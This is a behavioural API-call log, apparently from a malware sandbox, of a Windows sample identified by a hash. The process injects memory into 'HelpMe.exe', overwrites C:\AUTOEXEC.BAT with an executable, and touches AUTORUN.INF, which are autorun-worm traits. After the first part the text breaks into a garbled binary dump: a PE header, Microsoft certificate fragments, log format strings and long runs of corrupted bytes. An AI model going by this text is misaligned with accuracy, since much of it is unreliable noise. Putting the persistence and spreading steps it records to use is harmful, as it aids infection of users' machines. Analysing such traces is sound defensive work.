"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bb00","nInBufferSize->0x00000046","lpOutBuffer->0x00486100","nOutBufferSize->0x000000ee","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->0x00000124","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000138","lpValueName->Data"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->0x00000138","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000124","lpValueName->Generation"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x00499e40","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x0049cc48","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00164000","th32ProcessID->1400","szExeFile->HelpMe.exe","lpAddress->0x00164000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->44918"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->44918"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\AUTOEXEC.BAT"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\AUTOEXEC.BAT.exe","lpNewFileName->C:\AUTOEXEC.BAT"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AutoRun.exe","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000012c","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\AUTORUN.INF.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x00499e40","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x0049cc88","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExW","SUCCESS","","hKey->0x00000124","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x00000124","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Generation"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013e","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013e","lpSubKey->CurVer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000126","hKey->0x0000013e","lpSubKey->(null)"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x0000013c","lpValueName->DontShowSuperHidden"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000140","hKey->0x0000013c","lpSubKey->(null)"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000140","lpValueName->ShellState"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000140","lpValueName->ShellState"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000140","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000140","lpValueName->ForceActiveDesktopOn"
"20190111212126.399","1748","9dd68MZ
!This program cannot be run in DOS mode.
@.rsrc
SetupResources.pdb
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXX
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
070822223102Z
120825070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
Il/$>e
r0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
091207224029Z
110307224029Z0
Washington1
Redmond1
Microsoft Corporation1
Microsoft Corporation0
3http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H
,http://www.microsoft.com/pki/certs/CSPCA.crt0
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
060916010447Z
190915070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Timestamping PCA0
ipfx'f
N+"\hE
","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileW","SUCCESS","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","DeleteFileW","FAILURE","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_LOGOFF
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_REBOOT
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
GENERIC_WRITE
INTERNET_FLAG_EXISTING_CONNECT
EWX_RESTARTAPPS
SHTDN_REASON_MAJOR_HARDWARE
"%s","%d","%s","%d","filesystem","CopyFileA","FA
%;6E","","lpExistingFileName->%s","lpNewFileName->%s"
SERVICE_CONTROL_NETBINDENABLE
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
SHTDN_REASON_MAJOR_OPERATINGSYSTEM
"%s","%d","%s","%d","filesystem","CopyFileW","SUCCESS","","lpExistingFileName->%ws","lpNewFileNa3(.>@
ZTI.d?$TDN_REASON_MAJOR_OTHER
","%d","%
"FAQNURO ,"z
)meNam
imeNamee>-
eea,"%
l#ud",BD)l
d3","lpNewFilfNC_U
<812bzej}lcgmq~ykucfmk;7y~l4'7scGG@
F'v}x1pi
AiZN\l6"
8:00cjxf:7aw
! -:>2
abnglga"szg]
!I5DHFgaq's17AM
~UGvY\U~CAGIIv
	G 46144
	QD@cI
\UCIBDU]
vqy|ebq
]IuIXBFX\VtXBV}POI
JF8;d79bA
AIdX[Sy
>0.,7*q
Z\@`S@\QSGAG
<=4ojsa26	/+
9>*nl|0d68
DHFfQB
JAtu+t13r
A_PRZT^FdEN
KbdT.8:i{r-w0001
VY\UCMQyoO
kUA]PQTtX^Ty
qyarrgk
	QZF"_
	QOIOJ
v9y|ddu
5 (HpPZQ
XiZ	6;	
<n79bA
NX[UDO
R}['MBV
-FHP#2:akb=
]@y^`YD
^y^rEVRG
]^|AE`YDWRF
NMRARR
Pt(,"tL
VYCI%N@MF6Z
7woa!6%KOG
tT@YSUyMoM
A]<PCA6&0
R@9ATJ
R@7EDrEVVUB
WvLL`YD
rIDUBbUDW^L
FUB\UR}oF
<812vk}qcko}cru|","9#!x}j*%:d&$&
#|*pc-tf51{2&574b7t00-'qkv!{#*'>keyb2c24bk!3a}w!}
{bcsu}
v,79ory"
a	$3:4&)
ai"0x0cri}q~qeip+9fw
+0/*08
ebg8"," ?
,3 ckt!6wl}<" f&+&vyb79d517rk4*q#<dbq0=n!)*"}s2d6b7&3nx{u92gq0a;2cu`1q,"lp
!6$,06rmd7`0000cubtea!(
:?7rzwp
yqfsa)"
>##cati=+
=/&bpd*
|0010wulip//
 *5!ct->c=bfysuos{lYXm~o
vcw|}gk351qipg~w}}omw06ytg3'0e&eb3ds6o-vt;tv,7`)/jd`-41bfd6quv;u-*73w}80fcaq/y4)xfq;c`nnvu{g
qregi::&<pbg
lzcnefhKeydp
'2 'are
;7>/+0
#"&3,4lBXgmbt}yctrfnf~myzgeb",k
cqjlivf"(w
g(# f<&-}ys'm-z
d79+-f#1{r`="}#!;*{ks1b*dcaq
lu4-w`=~( pkz+}mwexijghk  $=st;7vip
",""el<
.!96><*
,:)and\
!7$>+6vRLnswnkqfnuses12x`gpclivnqxyesp|(+w|8cfe
-1'ays0f"yp#hj' g4&574bTIGV\
44w3n=4,6}cwv c24b}39hg|1vhmfy68",
tr*jxf
kcl",q 
{sc<9Sub{
+of#?>1$
8<(1<+
De;87*
oc6$:5m_Oe`
dwtxu}w121eyqtpeoiqbvs}","n,;|wm1($z3)#juw'rd5f,hs-6`("yeq!+c&fdd4cz;}'=!.yc|01+m
'a&.vfp;n`"1`~gocw> moryud}
&''0> 
ESS"{jo+xu}y0000ud}'1`
5)*)'6
Z17_]PBG
T]379!Yn
N180fc24*8da744d","lpAddress->0x00000000","dwSize->1048576","flAlloc
q{`f->0*ctcxuZ\
?ou->0;
lt_SE]TLyy
cTEE[_UBnTCRGEKBGKkqKA^KM
Sbfdd442d6bdca818
a"0G:ta744d","37686	 }EHmbE
.2Virt
nQmlocEx",
CESSb,"0|
2 0","th32
:2,"szExeFhle-V
:sfe6ceb376d9d51d7
a">F7'4bd1bfdd442d~
3(0fc24b8d`744
UCtdres;
< x0015000
dwSi:e->
1(4","
onType->0x00001000","flPro
3cd->0x0
2 2004.+
3)0111
0!21.3
"1744","13d&88cf
aub376
1d79nc2f
E7$bd1b
b8da8m4t","1
5cUx","
","tkA2@roce
fdd4,Dd&
->0xVK0 0000
tyonTy
-.0x00
6!","1
1t79bc
fs24b8
eficeI
efice-
ote->0
7'e463
0!00",
"~OutB
BitesR
eblapped->
6!","1
1t79bc
`8da744d",
56`r-"
Ntice","DeviLgI
[ml","SUCCE!c ,"r-"
ogvice->0x0
	fwIoContro
2390008","
Y/>0x77e463
 ,&<HnBufferSize->0x000001`
\rO[D@uxVgr!
."<_@yJJqRK[wrpJf-2
0fc2c"0
np}[gr&Lrp
I/>@U20
:85Hg6
`d1Odd
Iti5I ,`hgvGOgIIomnb^ml(
	."rjgv
_Ao`EpoLrmdS
_KnJGdfs@QiRW/>
 ,x^rO
GvBsUdej`kzU
npmBgrXUrped->
:1","1
:","9dj68
U`376d9}4t
3caJ1{_
da^GPCSjGAM
CH"D@s>
rPonCC7
*!72![{""
T`B_SU@GoIO
UC@90;4jG\N
VS#]ZV18
}EDUHf00g.e	
;	AQS=H00
3}_QF`K
Hw_;_^E@	
2c!eQ(
HPDx"5gY^uHUA
,'eBXMUwX]WtJ1
1jVTTVIdX[Qo"
QGA36La4
1tD]CXG0
Kn['0C4G
sEBBU^GdPCA
4gQQVjM
H]Dx55"QB
0wUViZ
I>%zwUE
^T]Wf12 NCQ	8.
AJY:IDUd_gYTGNbC@0
9sCTPFTtX^To3^5qIVw^X]rCKW
D88cc2W
ET379)&`(&y
jCMZrNo"
uEL7:40
,dKBF?-
2-kc=b
17@U]jUBFQAIclp
2~HGBq-
cUBFYRUg",_n"*
H{H900
LJU+UBFYSTq0"B >
z>0E2bTU"
HJU3UIg0
~qWBGPSTp1
3`TUr\VYEGgGHrLy"L k
5')UZS
%caj3jU
BQcdC.pTPyHGBi
4e~,a+
olm.p62
GUgZ{"
EUuHg03ufzc4>z]m
USFMUuHo"
&T9V@}
xy^DUB_UDm\G
#Bu1/+;c{dVT\]2
cffnhM
OKW+DBY^Wq00
BGS@wKUT11
0uTFr[AJTLXvYEQYFeF9d
f,QUB6S#
G\VXXX~K@V
</7 !S
_TU`_Y
DG^"hs
^Q1|9X
,7	3)4!"
v^Cb\DgP]GT2
6eB@~CGI"
5}VVIPU
]C6d!frT
`gQF(W
GHfTTD]OIL
leF.e6!
2LHNG,"
YJUsBY
YAMN=+
?uSLddfGfIA\0R3vWEaESCZFHxLJMf7
Wd&3#RM/
%44Sep
$VGQB	
6q]ViL
2PUr6'%,7>2LOGs
E^DUB0@:eIV?	5
@]0-&<pM
7'1;*"3
;=1KnkNaURMY^_12C3vWEmcq_DC"Y6s]Vmaidd
*s.&237<gp
6bpa&]Eu_
u,")3dLNyL
	oca}u^K'0
,+ <NIu0U3|rxU@cDPEL
?329p(
;-CYeND]u,"${
fe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesT
2q,#0q <#1748","8dd698cfe6ceb376d9d5
"fCiEWFX_e
"b`CrsSb
J"\~u_Se@}fpJtWGT]br[Be
]9WT1WU9Q
QbWWbRTd
"gTaQtiYV"
S`vCpeS
DnxEmTTryTBOGeE`odPaR
U6ZVcY
gUzvEje"
Pl\L>	
0	S0	T9
"l3"SQ1XR1PR2PV1ST.R^1@
1TW8AN"
"7aC'pS7
R0TS0T
0TX0TS1WR2TV1KV8TD,D
'ilUZN"Se; EScZH""
TAOV:H@eC,^brY
fUNQUb
bTIPSdTL
"c-pqEc+
VfUNWSb
+`{Cu+f
eB7PryD
S6TARP1TO
4R@SW7
DSe;{uScZ
QGeT9[UeC
Z2lCs=22"
HQS0R@CH"X3
$xgZH@Se;'&ScZHF"
.eIUZVx
e]ZJAL_
yqZJDSTCAEWS*,20X7wd
0000","lpFileName,>cdraxi#2
"20190111212121/421&,*1'4
dd688cfe6ceb376d9e53d39jc3fa534jd1bfdd442d6bdca81(0Fcr4
8da744d","1768",#psobers#,#Cse`tgPpoaeqsKnvepnclS"("WUGCASW"("5440&,&ltAtphigapignFaee%> n}ld)*,*lxCgmeafdDife%>S:\WYNTOGS\syste}3
\heLpme.exe
*"281)0
#5'$688coe
cdj3&9d9d$1d
8jc#vc57%bd
coduf42d7bd"`11
fc25b8'`;4%7","076y# "U&ocers"o#_i
Gxec#,"
TA@AVU%,"","
=g}12\H
-201(01
0:1=!21.%01
- 1748","9dd.r:sB/4sgb37
{f'8j`#Nc575bdqcndu
72d'bd
ec2%b8
!,"076
#$"w|lesxst
fadGil
@CERS"
#".!lCoke->0(z2 lz2qXh.2
011021r0:1!
31"="1
:dd'88
a377d9
49d8,bc2gc5
edd542
;181fc
5b:ge223d","
9vuei.2W9gqT.DyneW"
opFile
`oe->C:\DOCUME~10
Vn4\LO;
z^Dd}pH
#,"$v|eg
qedHcc%rc-*
FNESIC
211312q3!.#
2",#17t92,4
gd698c&d&c[
076l9du0t7
`2fk57tfd1bF(f$\~f&cf`e=7?8fc24b8da744d","1768","memory","V`rtualAlfdoHv-<3AFWVSDK;,"0x00154000
~6 8| <*(uCa6g=6z7%;z <**nQd msi8k
.>0y00p1!0$
!,"glP2ndew
.>0y00p1 0$
#20q8 1%
112021n5 16
!1758"l#)dp
;8cge6#dr3#
g9d41dw8rc
`574bdqcvdd
72d6bd#`(1
ec24b8$`'44
!,"176x#<"f
oesyst%l2,
fadFil%#<"S
@CESS"l#2,
Eile->py 00
30a0",bo^uR
frOfBy4dcTo
fad->6q5$0
	"2019p0!12
1121.4p5","
b )ef5<=eam?inn>99t(v&%q!.zc2fc574bd(bfdd44(
8gVi!g2 oQE[
GCwo.2
a xz$nu
a ~~8orU?Mv
mG:$vues4!|y22EG "x|; y|3"Q
3"]c6 Io.2]z6(Na )
)4(T.duZ.gr_z4t
ojVh|e
!nNtmb%sMfBytesToRead->"~6$8m
}3"0"1
:dd788#gg6ceb376d9d51d7i-a"",7'1bd1>)ft\{0t7rdu
;181fcr5Z8r
444m",b0'6.
/"fhle3xcts
!,"Vri4dViF
!,"RUC
!","hF)mu-
{00000p`$"
mNumbe2NvBF
fsToWr)uu->
311121r0"1.
31","1w5:!('9bc>12hjh8leb376d9d% v$-wu%~z/,(
z.BGFG
0fc24b8da744d","1768
*ct2&nu
+6$644r
m3'28",26k|=#{cuum4[!Wrhte
h|e4T!SUBCE
R2,4[/"hGil%,.0nJ30010at#<"x5vmbdrO&Cits
WoWsit%,.6'I70"
"r1!9&O212021r0>4
F!,"174x#<"
g688cf%7se]O46d9d5qe'9]
1fc574"e!bY
g442d6"esa
L;0fc24"<da7
p3'7:!('`ndlyr
ykb2=0AqtrQqle","SUCCESS",""58sZtrz
A~D_QQGyQzytesp>PuQ5/.
vc2!Ya3!]c3"Ic3>
>uc]Sur
fnt^Er3h
kemeMa.`eer"
"20190111"b0!6b,$71",>b5$
q.28td6
c%c#76
:d51d7yca2fc574bd1bfdd4xaf&"7aq=180>00$
kfq6$4q
/"1668b-
jst{y"l#Ber
verxVa,tuEm
!,"GAI
TBE5S!",#hK%x=>'
300100y9:,
sVadue
@omxos)uqnY
":01y1)1
221:1.t3!",
2748",b8td6
;cfe6c%c#76
:d51d7ycs2X
674jd1"g|d
1d6jdc!93;4ff22e0mk<89j-<3#$"-4;:k
|unjmY
v@AhXLD`eyETz
bgpwped
x00000098","
q.2r1ey
 Bi3Se}&{Fy8wu],U24vDQQ
WB]v.2:x xS1{=
vn`r5neA
c}Ay<\E9gRqtto^
311021r0"1;
11"-"1w5("9
:dd788#gu6v
a377d9$4!d"
ac2gc5w5rd$
edd542$7rdv
;181fcr5r8q
444e",b0/6
/"sqst%l:,
ladDib2`jy
/"S]CC
3x5id7p1 0"
!lpFil%Ocna(8rp}bnah k|}0
7$') **-,,.
,"1748","
dd688cfe6ceb376d9d51d79bc2
k|a{<XalpMuxgh=t
;9"-"1w5:","9dd688cfe6c}51':3;t01d7
